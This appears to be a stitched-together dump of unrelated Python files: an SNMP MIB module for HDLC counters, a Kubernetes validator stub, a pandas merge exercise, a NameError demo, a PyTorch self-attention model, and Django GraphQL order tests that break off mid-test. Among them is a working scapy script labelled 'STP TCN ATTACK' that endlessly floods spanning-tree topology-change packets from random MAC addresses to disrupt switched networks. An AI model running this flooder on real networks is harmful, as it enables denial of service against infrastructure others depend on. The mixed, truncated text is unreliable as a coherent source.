if mibBuilder.loadTexts: aptisHdlcSysErrors.setDescription('Number of HDLC system errors.')
aptisHdlcParityErrors = MibTableColumn((1, 3, 6, 1, 4, 1, 2637, 2, 7, 1, 1, 5), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: aptisHdlcParityErrors.setStatus('mandatory')
if mibBuilder.loadTexts: aptisHdlcParityErrors.setDescription('Number of HDLC parity errors.')
aptisHdlcFCSErrors = MibTableColumn((1, 3, 6, 1, 4, 1, 2637, 2, 7, 1, 1, 6), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: aptisHdlcFCSErrors.setStatus('mandatory')
if mibBuilder.loadTexts: aptisHdlcFCSErrors.setDescription('Number of HDLC Frame CheckSum errors.')
aptisHdlcAborts = MibTableColumn((1, 3, 6, 1, 4, 1, 2637, 2, 7, 1, 1, 7), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: aptisHdlcAborts.setStatus('mandatory')
if mibBuilder.loadTexts: aptisHdlcAborts.setDescription('Number of HDLC aborts.')
aptisHdlcFramingErrors = MibTableColumn((1, 3, 6, 1, 4, 1, 2637, 2, 7, 1, 1, 8), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: aptisHdlcFramingErrors.setStatus('mandatory')
if mibBuilder.loadTexts: aptisHdlcFramingErrors.setDescription('Number of HDLC framing errors.')
aptisHdlcReceiveOverruns = MibTableColumn((1, 3, 6, 1, 4, 1, 2637, 2, 7, 1, 1, 9), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: aptisHdlcReceiveOverruns.setStatus('mandatory')
if mibBuilder.loadTexts: aptisHdlcReceiveOverruns.setDescription('Number of HDLC receive overruns.')
aptisHdlcTransmitUnderflows = MibTableColumn((1, 3, 6, 1, 4, 1, 2637, 2, 7, 1, 1, 10), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: aptisHdlcTransmitUnderflows.setStatus('mandatory')
if mibBuilder.loadTexts: aptisHdlcTransmitUnderflows.setDescription('Number of HDLC transmit underflows.')
aptisHdlcChannelTable = MibTable((1, 3, 6, 1, 4, 1, 2637, 2, 7, 2), )
if mibBuilder.loadTexts: aptisHdlcChannelTable.setStatus('mandatory')
if mibBuilder.loadTexts: aptisHdlcChannelTable.setDescription('These parameters represent statistics for all of the HDLC channels for a single HDLC chip. These are errors that cannot be specified on a specific HDLC channel.')
aptisHdlcChannelEntry = MibTableRow((1, 3, 6, 1, 4, 1, 2637, 2, 7, 2, 1), ).setIndexNames((0, "APTIS-HDLC-MIB", "aptisHdlcIfIndex"), (0, "APTIS-HDLC-MIB", "aptisHdlcChannelIfIndex"))
if mibBuilder.loadTexts: aptisHdlcChannelEntry.setStatus('mandatory')
if mibBuilder.loadTexts: aptisHdlcChannelEntry.setDescription('The Parameters for the all of the HDLC connections for a specific HDLC chip.')
aptisHdlcChannelIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 2637, 2, 7, 2, 1, 1), Index()).setMaxAccess("readonly")
if mibBuilder.loadTexts: aptisHdlcChannelIfIndex.setStatus('mandatory')
if mibBuilder.loadTexts: aptisHdlcChannelIfIndex.setDescription('HDLC channel interface index.')
aptisHdlcChannelStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 2637, 2, 7, 2, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6))).clone(namedValues=NamedValues(("init", 1), ("down", 2), ("disabled", 3), ("smconnnectwait", 4), ("up", 5), ("smdisconnectwait", 6)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: aptisHdlcChannelStatus.setStatus('mandatory')
if mibBuilder.loadTexts: aptisHdlcChannelStatus.setDescription('This indicates the status of the HDLC Channel.')
aptisHdlcChannelRcvFrames = MibTableColumn((1, 3, 6, 1, 4, 1, 2637, 2, 7, 2, 1, 3), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: aptisHdlcChannelRcvFrames.setStatus('mandatory')
if mibBuilder.loadTexts: aptisHdlcChannelRcvFrames.setDescription('Number of frames received on the HDLC channel.')
aptisHdlcChannelRcvOctets = MibTableColumn((1, 3, 6, 1, 4, 1, 2637, 2, 7, 2, 1, 4), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: aptisHdlcChannelRcvOctets.setStatus('mandatory')
if mibBuilder.loadTexts: aptisHdlcChannelRcvOctets.setDescription('Number of octets received on the HDLC channel.')
aptisHdlcChannelRcvDrops = MibTableColumn((1, 3, 6, 1, 4, 1, 2637, 2, 7, 2, 1, 5), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: aptisHdlcChannelRcvDrops.setStatus('mandatory')
if mibBuilder.loadTexts: aptisHdlcChannelRcvDrops.setDescription('Number of frames received on the HDLC channel that were dropped.')
aptisHdlcChannelRcvMaxPacket = MibTableColumn((1, 3, 6, 1, 4, 1, 2637, 2, 7, 2, 1, 6), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: aptisHdlcChannelRcvMaxPacket.setStatus('mandatory')
if mibBuilder.loadTexts: aptisHdlcChannelRcvMaxPacket.setDescription('Maximum receive packet size on the HDLC channel.')
aptisHdlcChannelRcvOverruns = MibTableColumn((1, 3, 6, 1, 4, 1, 2637, 2, 7, 2, 1, 7), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: aptisHdlcChannelRcvOverruns.setStatus('mandatory')
if mibBuilder.loadTexts: aptisHdlcChannelRcvOverruns.setDescription('Number of frames received on the HDLC channel with overrun errors.')
aptisHdlcChannelRcvFCSErrors = MibTableColumn((1, 3, 6, 1, 4, 1, 2637, 2, 7, 2, 1, 8), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: aptisHdlcChannelRcvFCSErrors.setStatus('mandatory')
if mibBuilder.loadTexts: aptisHdlcChannelRcvFCSErrors.setDescription('Number of frames received on the HDLC channel with frame checksum errors.')
aptisHdlcChannelRcvByteAlign = MibTableColumn((1, 3, 6, 1, 4, 1, 2637, 2, 7, 2, 1, 9), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: aptisHdlcChannelRcvByteAlign.setStatus('mandatory')
if mibBuilder.loadTexts: aptisHdlcChannelRcvByteAlign.setDescription('Number of frames received on the HDLC channel with byte alignment errors.')
aptisHdlcChannelRcvAborts = MibTableColumn((1, 3, 6, 1, 4, 1, 2637, 2, 7, 2, 1, 10), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: aptisHdlcChannelRcvAborts.setStatus('mandatory')
if mibBuilder.loadTexts: aptisHdlcChannelRcvAborts.setDescription('Number of receive attempts on the HDLC channel that were aborted.')
aptisHdlcChannelTransmitFrames = MibTableColumn((1, 3, 6, 1, 4, 1, 2637, 2, 7, 2, 1, 11), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: aptisHdlcChannelTransmitFrames.setStatus('mandatory')
if mibBuilder.loadTexts: aptisHdlcChannelTransmitFrames.setDescription('Number of frames transmitted on the HDLC channel.')
aptisHdlcChannelTransmitOctets = MibTableColumn((1, 3, 6, 1, 4, 1, 2637, 2, 7, 2, 1, 12), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: aptisHdlcChannelTransmitOctets.setStatus('mandatory')
if mibBuilder.loadTexts: aptisHdlcChannelTransmitOctets.setDescription('Number of octets transmitted on the HDLC channel.')
aptisHdlcChannelTransmitDrops = MibTableColumn((1, 3, 6, 1, 4, 1, 2637, 2, 7, 2, 1, 13), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: aptisHdlcChannelTransmitDrops.setStatus('mandatory')
if mibBuilder.loadTexts: aptisHdlcChannelTransmitDrops.setDescription('Number of transmitted frames dropped on the HDLC channel.')
aptisHdlcChannelTransmitUnderflows = MibTableColumn((1, 3, 6, 1, 4, 1, 2637, 2, 7, 2, 1, 14), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: aptisHdlcChannelTransmitUnderflows.setStatus('mandatory')
if mibBuilder.loadTexts: aptisHdlcChannelTransmitUnderflows.setDescription('Number of transmit underflows on the HDLC channel.')
aptisHdlcChannelTransmitBuffer = MibTableColumn((1, 3, 6, 1, 4, 1, 2637, 2, 7, 2, 1, 15), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: aptisHdlcChannelTransmitBuffer.setStatus('mandatory')
if mibBuilder.loadTexts: aptisHdlcChannelTransmitBuffer.setDescription('HDLC channel transmit buffer size.')
mibBuilder.exportSymbols("APTIS-HDLC-MIB", aptisHdlcChannelRcvOverruns=aptisHdlcChannelRcvOverruns, aptisHdlcChannelIfIndex=aptisHdlcChannelIfIndex, aptisHdlcChannelRcvFCSErrors=aptisHdlcChannelRcvFCSErrors, aptisHdlcFramingErrors=aptisHdlcFramingErrors, aptisHdlcChannelRcvFrames=aptisHdlcChannelRcvFrames, aptisHdlcTransmitDrops=aptisHdlcTransmitDrops, aptisHdlcChannelTransmitUnderflows=aptisHdlcChannelTransmitUnderflows, aptisHdlcReceiveDrops=aptisHdlcReceiveDrops, aptisHdlcChannelTable=aptisHdlcChannelTable, aptisHdlcChannelTransmitOctets=aptisHdlcChannelTransmitOctets, aptisHdlcChannelTransmitBuffer=aptisHdlcChannelTransmitBuffer, aptisHdlcChannelTransmitFrames=aptisHdlcChannelTransmitFrames, aptisHdlcChannelRcvDrops=aptisHdlcChannelRcvDrops, aptisHdlcChannelTransmitDrops=aptisHdlcChannelTransmitDrops, aptisHdlcChannelEntry=aptisHdlcChannelEntry, aptisHdlcChannelRcvMaxPacket=aptisHdlcChannelRcvMaxPacket, aptisHdlcFCSErrors=aptisHdlcFCSErrors, aptisHdlcParityErrors=aptisHdlcParityErrors, aptisHdlcEntry=aptisHdlcEntry, Index=Index, aptisHdlcChannelStatus=aptisHdlcChannelStatus, aptisHdlcReceiveOverruns=aptisHdlcReceiveOverruns, aptisHdlc=aptisHdlc, aptisHdlcIfIndex=aptisHdlcIfIndex, aptisHdlcTransmitUnderflows=aptisHdlcTransmitUnderflows, aptisHdlcChannelRcvOctets=aptisHdlcChannelRcvOctets, aptisHdlcSysErrors=aptisHdlcSysErrors, aptisHdlcAborts=aptisHdlcAborts, aptisHdlcChannelRcvAborts=aptisHdlcChannelRcvAborts, aptisHdlcChannelRcvByteAlign=aptisHdlcChannelRcvByteAlign, aptisHdlcTable=aptisHdlcTable)
| python |
from datetime import datetime
from validator.kube.resource import KubernetesResourceProvider
from validator.base import ClusterResult
from validator.namespace import validate_namespaces
def run_validate(host, token):
provider = KubernetesResourceProvider(host, token)
ns = validate_namespaces(provider)
now = datetime.now()
return ClusterResult(ns, now)
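# Example (a sketch; the host URL and token are placeholders):
#   result = run_validate("https://kube-apiserver.example:6443", "<bearer-token>")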
| python |
#!/usr/bin/env python
# coding: utf-8
# # Coding Exercises (Part 1)
# ## Full Data Workflow A-Z: Merging, Joining, Concatenating
# ### Exercise 12: Merging, joining, aligning and concatenating Data
# Now, you will have the opportunity to analyze your own dataset. <br>
# __Follow the instructions__ and insert your code! You are either requested to
# - Complete the Code and __Fill in the gaps__. Gaps are marked with "__---__" and are __placeholders__ for your code fragment.
# - Write Code completely __on your own__
# In some exercises, you will find questions that can only be answered if your code is correct and returns the right output! The correct answer is provided below your coding cell. There you can check whether your code is correct.
# If you need a hint, check the __Hints Section__ at the end of this Notebook. Exercises and Hints are numerated accordingly.
# If you need some further help or if you want to check your code, you can also check the __solutions notebook__.
# ### Have Fun!
# --------------------------------------------------------------------------------------------------------------
# ## Option 1: Self_guided
# ### Concatenating DataFrames vertically
# __Import__ the cars dataset (with cars from usa and europe) from the csv-file __cars_clean.csv__. <br>
# Also __import__ the csv-file __cars_jap.csv__ (with cars from japan) and __concatenate__ both DataFrames __vertically__! <br>
# __Save__ the __concatenated DataFrame__ in the variable __cars_all__! <br>
# Finally, __sort__ cars_all by the model_year from __low to high__!
# ### Left Join
# __Import__ the csv-files __summer.csv__ (as summer) and __dictionary.csv__ (as dic) which contains the __full country name__ for the olympic country codes as well as __population__ and __gdp__ statistics for some countries.<br>
#
# __"Copy and paste"__ the __full country name__, __population__ and __gdp__ from the dic DataFrame __into the summer DataFrame__ with a __Left Join__!<br>
# __Save__ the new merged DataFrame in the variable __summer_new__!<br>
#
# __Inspect__ summer_new and determine the __olympic country codes__ for which the dic DataFrame does __not provide__ any information!
# ### Arithmetic operations between DataFrames / Alignment
# __Import__ the csv-files __ath_2008.csv__ and __ath_2012.csv__ with all medals winners in the Sport __Athletics__ in the Editions __2008__ and __2012__.
# For __all Athletes__ in the two DataFrames, __aggregate/add__ the total number of __Gold__, __Silver__ and __Bronze__ Medals over both editions! __Save__ the aggregated DataFrame in the variable __add__. (Hint: add should contain an index with the Athlete names and three columns, Gold, Silver, Bronze)
# __Sort__ add by Gold, Silver, Bronze from __high to low__! Change datatype to __integer__, if necessary! The first Athlete in your DataFrame should be ... no surprise ... Usain Bolt with 6 Gold and 0 Silver and Bronze Medals.
# -------------------------------------
# ## Option 2: Guided and Instructed
# # STOP HERE, IF YOU WANT TO DO THE EXERCISE ON YOUR OWN!
# +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# In[ ]:
#run the cell
import pandas as pd
# ### Concatenating DataFrames vertically
# In[ ]:
#run the cell
cars = pd.read_csv("cars_clean.csv")
# __Inspect__ the __cars__ DataFrame!
# In[ ]:
#run the cell
cars.head()
# In[ ]:
#run the cell
cars.tail()
# In[ ]:
#run the cell
cars.info()
# __Inspect__ the cars_jap DataFrame!
# In[ ]:
#run the cell
cars_jap = pd.read_csv("cars_jap.csv")
# In[ ]:
#run the cell
cars_jap.head()
# Before we can concatenate both DataFrames, we need to __align__ them!<br>
# 108. __Insert__ the column __origin__ to __cars_jap__ at the most appropriate position! __Fill in the gaps!__
# In[ ]:
cars_jap.insert(7, "origin", "japan")
# Also the column labels should match. <br>
# 109. __Overwrite__ the column labels in __cars_jap__ and use the same column labels that we have in cars!
# In[ ]:
cars_jap.columns = cars.columns
# __Inspect__!
# In[ ]:
#run the cell
cars_jap.head()
# 110. __Concatenate__ both DataFrames __vertically__ and create a __new RangeIndex__! __Save__ the new DataFrame in the variable __cars_all__!
# In[ ]:
cars_all = pd.concat([cars, cars_jap], ignore_index= True)
# __Inspect__!
# In[ ]:
#run the cell
cars_all.head()
# In[ ]:
#run the cell!
cars_all.tail()
# 111. __Sort cars_all__ by the __model_year__ from __low to high__! Create a __new RangeIndex__ (drop the old)! __Fill in the gaps__!
# In[ ]:
cars_all = cars_all.sort_values("model_year").reset_index(drop = True)
# __Inspect__!
# In[ ]:
#run the cell
cars_all.head()
# In[ ]:
#run the cell
cars_all.tail()
# In[ ]:
#run the cell
cars_all.info()
# ----------------------------------------------------------------------
# ### Left Join
# In[ ]:
# run the cell!
summer = pd.read_csv("summer.csv")
# __Inspect__ the __summer__ DataFrame!
# In[ ]:
# run the cell!
summer.head()
# In[ ]:
# run the cell!
dic = pd.read_csv("dictionary.csv")
# __Inspect__ dic!
# In[ ]:
# run the cell!
dic.head()
# __dic__ contains the Olympic Games __Country Codes__ ("Code") with the corresponding __full country names__ ("Country") as well as recent __Population__ and __GDP__ statistics.<br>
# 112. __Create__ the columns __Country__, __Population__ and __GDP per Capita__ in the __summer__ DataFrame by using a __Left Join__ with __pd.merge()__. <br>
# __Save__ the merged Dataframe in the variable __summer_new__! __Fill in the gaps__!
# In[ ]:
summer_new = pd.merge(summer, dic, how = "left", left_on= "Country", right_on = "Code")
# __Inspect__ summer_new!
# In[ ]:
# run the cell!
summer_new.head()
# In[ ]:
# run the cell!
summer_new.info()
# Apparently, __dic__ does __not contain__ additional information for __all olympic country codes__ that are in the __summer__ Dataframe.
# 113. __Filter__ summer_new for the elements in the column __Country_x__, where the __corresponding value__ in the column __Code__ is __missing__! <br>
# __Count__ the frequency! __Fill in the gaps__!
# In[ ]:
summer_new.loc[summer_new.Code.isnull(), "Country_x"].value_counts()
# For these country codes, we need to find __other sources__ for additional information on the __full country name__, __population__ and __gdp__ (most of these countries do not exist any more.) -> BONUS EXERCISE ;-)
# --------------------------
# ### Arithmetic operations between DataFrames / Alignment
# In[ ]:
#run the cell
ath_2008 = pd.read_csv("ath_2008.csv")
ath_2012 = pd.read_csv("ath_2012.csv")
# __Inspect__ the __ath_2008__ DataFrame. It contains all athletes who won medals in __Athletics__ in the Edition __2008__.
# In[ ]:
#run the cell
ath_2008.head()
# In[ ]:
#run the cell
ath_2008.info()
# __Inspect__ the __ath_2012__ DataFrame. It contains all athletes who won medals in __Athletics__ in the Edition __2012__.
# In[ ]:
#run the cell
ath_2012.head()
# In[ ]:
#run the cell
ath_2012.info()
# For __all Athletes__ in the two DataFrames, __aggregate/add__ the total number of __Gold__, __Silver__ and __Bronze__ Medals over both editions! __Save__ the aggregated DataFrame in the variable __add__!
# 114. First, __set__ the __Athlete__ column as the __index__ in both DataFrames! __Save__ the changes!
# In[ ]:
ath_2008.set_index("Athlete", inplace= True)
# In[ ]:
ath_2012.set_index("Athlete", inplace= True)
# 115. __Add__ both DataFrames with the __most appropriate method__! __Save__ the resulting DataFrame in the variable __add__!
# In[ ]:
add = ath_2008.add(ath_2012, fill_value=0)
# __Inspect__!
# In[ ]:
#run the cell
add.head(10)
# 116. __Sort__ the athletes by the number of __Gold__, __Silver__ and __Bronze__ medals from __high to low__!<br>
# __Fill in the gaps!__ Who is the top athlete?
# In[ ]:
add = add.sort_values(["Gold", "Silver", "Bronze"], ascending = False).astype("int")
# In[ ]:
# run the cell!
add.head()
# In[ ]:
# run the cell!
add.tail()
# No surprise, it's Usain Bolt!
# # Well Done!
# ------------------------------------------------
# # Hints (Spoiler!)
# 108. insert() method, index pos. 7
# 109. columns attribute
# 110. pd.concat() method, ignore index
# 111. methods sort_values() and reset_index()
# 112. left DataFrame: summer, on "Country" and "Code"
# 113. methods isnull() and value_counts()
# 114. set_index() method
# 115. add() method, fill_value = 0
# 116. pass a list of columns to sort_values() method (sequence matters!)
| python |
# Incorrect order: 'c' is used before it is assigned
a = 5
b = 5
print(c)  # raises NameError: name 'c' is not defined
c = 6
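# Corrected order: assign 'c' before printing it
a = 5
b = 5
c = 6
print(c)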
# -*- coding: utf-8 -*-
from scapy.layers.l2 import Dot3, LLC, STP
from scapy.all import sendp, RandMAC
# --------------------------------------------------------------------------
# STP TCN ATTACK
# --------------------------------------------------------------------------
def run(inter):
"""
This function launch STP TCN ATTACK
:param inter: interface to be launched the attack
:type inter: str
"""
interface = str(inter[0])
if len(interface) > 0:
try:
while 1:
# dst=Ethernet Multicast address used for spanning tree protocol
srcMAC = str(RandMAC()) # Random MAC in each iteration
p_ether = Dot3(dst="01:80:c2:00:00:00", src=srcMAC)
p_llc = LLC()
p_stp = STP(bpdutype=0x80) # TCN packet
pkt = p_ether/p_llc/p_stp # STP packet structure
sendp(pkt, iface=interface, verbose=0)
except KeyboardInterrupt:
pass
def run_attack(config):
""" This function is used for launch the STP TCN attack
:param config: GlobalParameters option instance
:type config: `GlobalParameters`
"""
run(config.interface)
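# Example (interface name is a placeholder; sending raw frames requires root privileges):
# run(["eth0"])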
| python |
# define self-attention
# lightly modified from code for the paper "A Structured Self-Attentive Sentence Embedding"
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
class StructuredSelfAttention(torch.nn.Module):
def __init__(self, batch_size, lstm_hid_dim, d_a, r, max_len, emb_dim=128, vocab_size=None,
use_pretrained_embeddings = False, embeddings=None, type=1, n_classes = 4, bidirectional=True):
"""
Initializes parameters
Args:
batch_size : {int} batch_size used for training
lstm_hid_dim: {int} hidden dimension for lstm
d_a : {int} hidden dimension for the dense layer
r : {int} attention-hops or attention heads
max_len : {int} number of lstm timesteps
emb_dim : {int} embeddings dimension
vocab_size : {int} size of the vocabulary
use_pretrained_embeddings: {bool} use or train your own embeddings
embeddings : {torch.FloatTensor} loaded pretrained embeddings
type : [0,1] 0-->binary_classification 1-->multiclass classification
n_classes : {int} number of classes
Returns:
self
Raises:
Exception
"""
super(StructuredSelfAttention,self).__init__()
self.emb_dim = emb_dim
self.embeddings= nn.Embedding(vocab_size, emb_dim)
        self.lstm = torch.nn.LSTM(emb_dim, lstm_hid_dim, 1, batch_first=True, bidirectional=bidirectional)
        if bidirectional:
            self.bi_num = 2
        else:
            self.bi_num = 1
self.linear_first = torch.nn.Linear(self.bi_num*lstm_hid_dim, d_a)
self.linear_first.bias.data.fill_(0)
self.linear_second = torch.nn.Linear(d_a, r)
self.linear_second.bias.data.fill_(0)
self.n_classes = n_classes
self.linear_final = torch.nn.Linear(self.bi_num*lstm_hid_dim, self.n_classes)
self.batch_size = batch_size
self.max_len = max_len
self.lstm_hid_dim = lstm_hid_dim
self.hidden_state = self.init_hidden()
self.r = r
self.type = type
def softmax(self, input, axis=1):
input_size = input.size()
trans_input = input.transpose(axis, len(input_size)-1)
trans_size = trans_input.size()
input_2d = trans_input.contiguous().view(-1, trans_size[-1])
        soft_max_2d = F.softmax(input_2d, dim=1)
soft_max_nd = soft_max_2d.view(*trans_size)
return soft_max_nd.transpose(axis, len(input_size)-1)
    def init_hidden(self):
        # hidden/cell state shape: (num_layers * num_directions, batch, hidden_size)
        return (Variable(torch.zeros(self.bi_num, self.batch_size, self.lstm_hid_dim).cuda()),
                Variable(torch.zeros(self.bi_num, self.batch_size, self.lstm_hid_dim).cuda()))
def forward(self, x):
embeddings = self.embeddings(x)
outputs, self.hidden_state = self.lstm(embeddings, self.hidden_state)
        x = torch.tanh(self.linear_first(outputs))
x = self.linear_second(x)
x = self.softmax(x, 1)
attention = x.transpose(1, 2)
sentence_embeddings = attention@outputs
avg_sentence_embeddings = torch.sum(sentence_embeddings,1)/self.r
        if not bool(self.type):
            output = torch.sigmoid(self.linear_final(avg_sentence_embeddings))
            return output, attention
        else:
            return F.log_softmax(self.linear_final(avg_sentence_embeddings), dim=1), attention # run this
#Regularization
def l2_matrix_norm(self, m):
"""
Frobenius norm calculation
"""
return torch.sum(torch.sum(torch.sum(m**2,1),1)**0.5).type(torch.DoubleTensor).cuda()
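# Minimal usage sketch (sizes are arbitrary assumptions; requires CUDA because
# init_hidden allocates hidden states on the GPU):
# model = StructuredSelfAttention(batch_size=32, lstm_hid_dim=64, d_a=32, r=4,
#                                 max_len=50, vocab_size=10000).cuda()
# x = torch.randint(0, 10000, (32, 50)).cuda()
# log_probs, attention = model(x)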
| python |
from django.test import override_settings
from django.utils import timezone
from hotels.models import HotelRoomReservation
from pretix.exceptions import PretixError
from pytest import mark
def test_cannot_create_order_unlogged(graphql_client, user, conference, mocker):
response = graphql_client.query(
"""mutation CreateOrder($code: String!, $input: CreateOrderInput!) {
createOrder(conference: $code, input: $input) {
... on CreateOrderResult {
paymentUrl
}
}
}""",
variables={
"code": conference.code,
"input": {
"tickets": [
{
"ticketId": "1",
"attendeeName": "ABC",
"attendeeEmail": "[email protected]",
"variation": "1",
"answers": [{"questionId": "1", "value": "Example"}],
}
],
"hotelRooms": [],
"paymentProvider": "stripe",
"email": "[email protected]",
"invoiceInformation": {
"isBusiness": False,
"company": "",
"name": "Patrick",
"street": "",
"zipcode": "92100",
"city": "Avellino",
"country": "IT",
"vatId": "",
"fiscalCode": "",
},
"locale": "en",
},
},
)
assert response["errors"][0]["message"] == "User not logged in"
@override_settings(FRONTEND_URL="http://test.it")
def test_calls_create_order(graphql_client, user, conference, mocker):
graphql_client.force_login(user)
create_order_mock = mocker.patch("api.orders.mutations.create_order")
create_order_mock.return_value.payment_url = "https://example.com"
create_order_mock.return_value.code = "123"
response = graphql_client.query(
"""mutation CreateOrder($code: String!, $input: CreateOrderInput!) {
createOrder(conference: $code, input: $input) {
... on CreateOrderResult {
paymentUrl
}
}
}""",
variables={
"code": conference.code,
"input": {
"tickets": [
{
"ticketId": "1",
"attendeeName": "ABC",
"attendeeEmail": "[email protected]",
"variation": "1",
"answers": [{"questionId": "1", "value": "Example"}],
}
],
"hotelRooms": [],
"paymentProvider": "stripe",
"email": "[email protected]",
"invoiceInformation": {
"isBusiness": False,
"company": "",
"name": "Patrick",
"street": "",
"zipcode": "92100",
"city": "Avellino",
"country": "IT",
"vatId": "",
"fiscalCode": "",
},
"locale": "en",
},
},
)
assert not response.get("errors")
assert response["data"]["createOrder"]["paymentUrl"] == (
"https://example.com?return_url=http://test.it/en/orders/123/confirmation"
)
create_order_mock.assert_called_once()
@override_settings(FRONTEND_URL="http://test.it")
def test_handles_payment_url_set_to_none(graphql_client, user, conference, mocker):
graphql_client.force_login(user)
create_order_mock = mocker.patch("api.orders.mutations.create_order")
# this happens when the order is free
create_order_mock.return_value.payment_url = None
create_order_mock.return_value.code = "123"
response = graphql_client.query(
"""mutation CreateOrder($code: String!, $input: CreateOrderInput!) {
createOrder(conference: $code, input: $input) {
... on CreateOrderResult {
paymentUrl
}
}
}""",
variables={
"code": conference.code,
"input": {
"tickets": [
{
"ticketId": "1",
"attendeeName": "ABC",
"attendeeEmail": "[email protected]",
"variation": "1",
"answers": [{"questionId": "1", "value": "Example"}],
}
],
"hotelRooms": [],
"paymentProvider": "stripe",
"email": "[email protected]",
"invoiceInformation": {
"isBusiness": False,
"company": "",
"name": "Patrick",
"street": "",
"zipcode": "92100",
"city": "Avellino",
"country": "IT",
"vatId": "",
"fiscalCode": "",
},
"locale": "en",
},
},
)
assert not response.get("errors")
assert response["data"]["createOrder"]["paymentUrl"] == (
"http://test.it/en/orders/123/confirmation"
)
create_order_mock.assert_called_once()
def test_handles_errors(graphql_client, user, conference, mocker):
graphql_client.force_login(user)
create_order_mock = mocker.patch("api.orders.mutations.create_order")
create_order_mock.side_effect = PretixError("Example")
response = graphql_client.query(
"""mutation CreateOrder($code: String!, $input: CreateOrderInput!) {
createOrder(conference: $code, input: $input) {
... on Error {
message
}
}
}""",
variables={
"code": conference.code,
"input": {
"tickets": [
{
"attendeeName": "ABC",
"attendeeEmail": "[email protected]",
"ticketId": "1",
"variation": "1",
}
],
"hotelRooms": [],
"paymentProvider": "stripe",
"email": "[email protected]",
"invoiceInformation": {
"isBusiness": False,
"company": "",
"name": "Patrick",
"street": "",
"zipcode": "92100",
"city": "Avellino",
"country": "IT",
"vatId": "",
"fiscalCode": "",
},
"locale": "en",
},
},
)
assert not response.get("errors")
assert response["data"]["createOrder"]["message"] == "Example"
create_order_mock.assert_called_once()
@override_settings(FRONTEND_URL="http://test.it")
@mark.django_db
def test_order_hotel_room(
graphql_client, hotel_room_factory, user, conference_factory, mocker
):
graphql_client.force_login(user)
conference = conference_factory(
start=timezone.make_aware(timezone.datetime(2020, 1, 1)),
end=timezone.make_aware(timezone.datetime(2020, 1, 10)),
)
create_order_mock = mocker.patch("api.orders.mutations.create_order")
create_order_mock.return_value.payment_url = "https://example.com"
create_order_mock.return_value.code = "123"
room = hotel_room_factory(conference=conference)
response = graphql_client.query(
"""mutation CreateOrder($code: String!, $input: CreateOrderInput!) {
createOrder(conference: $code, input: $input) {
... on CreateOrderResult {
paymentUrl
}
}
}""",
variables={
"code": conference.code,
"input": {
"tickets": [],
"paymentProvider": "stripe",
"email": "[email protected]",
"hotelRooms": [
{
"roomId": str(room.id),
"checkin": "2020-01-01",
"checkout": "2020-01-10",
}
],
"invoiceInformation": {
"isBusiness": False,
"company": "",
"name": "Patrick",
"street": "",
"zipcode": "92100",
"city": "Avellino",
"country": "IT",
"vatId": "",
"fiscalCode": "",
},
"locale": "en",
},
},
)
assert not response.get("errors")
assert response["data"]["createOrder"]["paymentUrl"] == (
"https://example.com?return_url=http://test.it/en/orders/123/confirmation"
)
reservation = HotelRoomReservation.objects.filter(room=room).first()
assert reservation.user == user
assert reservation.checkin == timezone.datetime(2020, 1, 1).date()
assert reservation.checkout == timezone.datetime(2020, 1, 10).date()
create_order_mock.assert_called_once()
def test_cannot_order_hotel_room_with_checkin_before_conference(
graphql_client, hotel_room_factory, user, conference_factory, mocker
):
graphql_client.force_login(user)
conference = conference_factory(
start=timezone.make_aware(timezone.datetime(2020, 1, 1)),
end=timezone.make_aware(timezone.datetime(2020, 1, 10)),
)
create_order_mock = mocker.patch("api.orders.mutations.create_order")
room = hotel_room_factory(conference=conference)
response = graphql_client.query(
"""mutation CreateOrder($code: String!, $input: CreateOrderInput!) {
createOrder(conference: $code, input: $input) {
__typename
... on CreateOrderResult {
paymentUrl
}
... on Error {
message
}
}
}""",
variables={
"code": conference.code,
"input": {
"tickets": [],
"paymentProvider": "stripe",
"email": "[email protected]",
"hotelRooms": [
{
"roomId": str(room.id),
"checkin": "2019-01-01",
"checkout": "2019-01-10",
}
],
"invoiceInformation": {
"isBusiness": False,
"company": "",
"name": "Patrick",
"street": "",
"zipcode": "92100",
"city": "Avellino",
"country": "IT",
"vatId": "",
"fiscalCode": "",
},
"locale": "en",
},
},
)
assert not response.get("errors")
assert response["data"]["createOrder"]["__typename"] == "Error"
assert response["data"]["createOrder"]["message"] == "Invaild check-in date"
create_order_mock.assert_not_called()
def test_cannot_order_hotel_room_with_checkin_after_conference(
graphql_client, hotel_room_factory, user, conference_factory, mocker
):
graphql_client.force_login(user)
conference = conference_factory(
start=timezone.make_aware(timezone.datetime(2020, 1, 1)),
end=timezone.make_aware(timezone.datetime(2020, 1, 10)),
)
create_order_mock = mocker.patch("api.orders.mutations.create_order")
room = hotel_room_factory(conference=conference)
response = graphql_client.query(
"""mutation CreateOrder($code: String!, $input: CreateOrderInput!) {
createOrder(conference: $code, input: $input) {
__typename
... on CreateOrderResult {
paymentUrl
}
... on Error {
message
}
}
}""",
variables={
"code": conference.code,
"input": {
"tickets": [],
"paymentProvider": "stripe",
"email": "[email protected]",
"hotelRooms": [
{
"roomId": str(room.id),
"checkin": "2020-01-20",
